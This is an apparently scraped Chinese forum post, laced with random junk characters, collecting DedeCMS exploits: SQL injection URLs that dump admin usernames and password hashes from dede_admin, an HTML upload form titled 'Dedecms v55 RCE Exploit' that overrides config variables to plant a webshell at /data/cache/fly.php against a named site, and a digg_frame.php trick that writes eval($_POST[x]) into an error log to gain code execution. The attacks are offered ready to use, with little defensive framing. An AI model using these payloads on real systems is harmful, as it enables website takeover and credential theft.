2 y- \' p2 `* k8 khttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
; }9 o% \) ?( d" ^1 q  u, j0 w9 o3 _- ?% z3 Y

5 y: p' p: o# L( |* A* G+ z# P) y; J/ W& x+ `" q
& |+ @! A8 L9 y+ _
) |, J6 O6 C) z' s3 W# m3 A
/ h4 f% f! y+ I3 n6 R/ a' @
# \% u5 R' M% p, T- K$ M1 m9 [% F
+ `/ \- _0 v! g" Y
9 H, B/ D5 k3 k( R8 u
) y0 B; L$ a; ~+ F0 q8 b
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
8 y1 ]0 W* S1 Q. J<html>
) U* Z& N5 q% h5 l<head>
( p+ Q- {  {, E6 p<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>1 ]) \% g! B3 \6 X" `( F9 L2 U3 p
</head>
" ?  W* M) I- E+ Q6 Z<body style="FONT-SIZE: 9pt">3 t$ h) q) [) s& B
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />& o) R: V: t+ B' e: t
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
1 E- i7 L, R: z<input type='hidden' name='activepath' value='/data/cache/' />
1 w2 B* H* l: K" f" z' x, L<input type='hidden' name='cfg_basedir' value='../../' />( r8 J7 v  @: W0 R+ x
<input type='hidden' name='cfg_imgtype' value='php' />% t$ ^4 m# }, ]) R8 d
<input type='hidden' name='cfg_not_allowall' value='txt' />
6 t  }- @! q* N9 p<input type='hidden' name='cfg_softtype' value='php' />
1 t" M5 p8 Q0 F8 A6 T" L2 ?, [<input type='hidden' name='cfg_mediatype' value='php' />
% Y. \+ Z" b  B2 f2 K1 o<input type='hidden' name='f' value='form1.enclosure' />
( a; q" H! J& z, s; A<input type='hidden' name='job' value='upload' />. M5 }) G; `: W3 n6 J
<input type='hidden' name='newname' value='fly.php' />
+ W) ]5 P: ~1 _8 fSelect U Shell <input type='file' name='uploadfile' size='25' />
' o5 \0 }0 J# O& p4 d<input type='submit' name='sb1' value='确定' /># T. x! o$ n5 u" ^6 z
</form>
3 I5 H: y# f# G/ ]<br />It's just a exp for the bug of Dedecms V55...<br />
1 O3 [( Y1 G- l6 G1 ^, pNeed register_globals = on...<br />
! C. L$ y) w- M/ KFun the game,get a webshell at /data/cache/fly.php...<br />
% V  g2 _3 v0 v4 W* Q</body>5 p, D, y( f5 v+ g' A5 u0 n3 R2 B
</html>
8 ]: T9 v# `( |7 l  c
3 Y- T5 F1 |  l) w" @5 Q; c% H. F

: `8 A& |1 ~2 p9 ?& ^( W+ y; J, I/ ~1 k9 h# H
6 b0 l# e$ N/ o( I2 k+ B

& `* e( \/ i7 _9 [0 Y
3 q5 ]9 B2 u0 h
* ^' W( s2 N; w6 F  ^# `
  ~( z4 X5 C" Y! B( G7 B1 Z, @, C% Z; I' }5 F
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
- v: C9 s( `: K% [" u2 R+ k利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
7 @2 w6 h0 B5 y% G0 A1. 访问网址:
( N  U1 u9 d1 L1 T0 x# S2 |9 I
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>% R  J) L6 |* v, {$ M: @6 A
可看见错误信息
6 j. U" [6 c. V: P2 Y* m8 N, G% C
6 @, j! f2 G( N$ J% ]$ e  k* T0 Y" c  P5 d* _( O/ Q
2. 访问
http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。9 Q9 A& h! V9 h# J
int(3) Error: Illegal double '1024e1024' value found during parsing
1 ]0 m& F, I0 AError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
0 L' b1 H8 R: ~9 J* i. j& I( n- |1 P4 p  i7 J& E$ Q1 U

4 E$ B4 ?' k4 n" m0 W, T3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是# x" \& S. |4 K% h

' q* B; `; Z$ G. L2 c! i" t' \
) A9 t2 j5 k6 X$ b; r4 v0 ]0 K+ k<form action=”
http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>. @) E4 X; r0 m, t' x; V9 [& _6 t
5 l& z- F: K; V% Y/ r  b  ]7 M

) E# U0 a  v; s按确定后的看到第2步骤的信息表示文件木马上传成功.
) E9 h2 U% h. Z: m. p0 K
" m* ~, L+ ]/ [2 t3 E- x# N2 q% S
- f6 Z8 ~. H' W$ w& T' q; E
& f$ B+ L2 E! q
' q$ E2 g' }* B! j

2 H2 t9 E1 r+ e. Z3 s
; s% f  x5 d/ Z: \  ]& R0 X- Q! W3 K+ b6 n; {" _3 F$ H
1 a# d1 O7 ]( G! L9 i$ Q4 w

+ ~9 N7 X. r% E4 C+ d1 b5 X0 I4 Z/ S' A, v8 U5 c: d

' Q: j& R" ]( s7 O( g2 i织梦(DedeCms)plus/infosearch.php 文件注入漏洞
4 N9 @3 x. n( ~; k/ d7 E3 ghttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表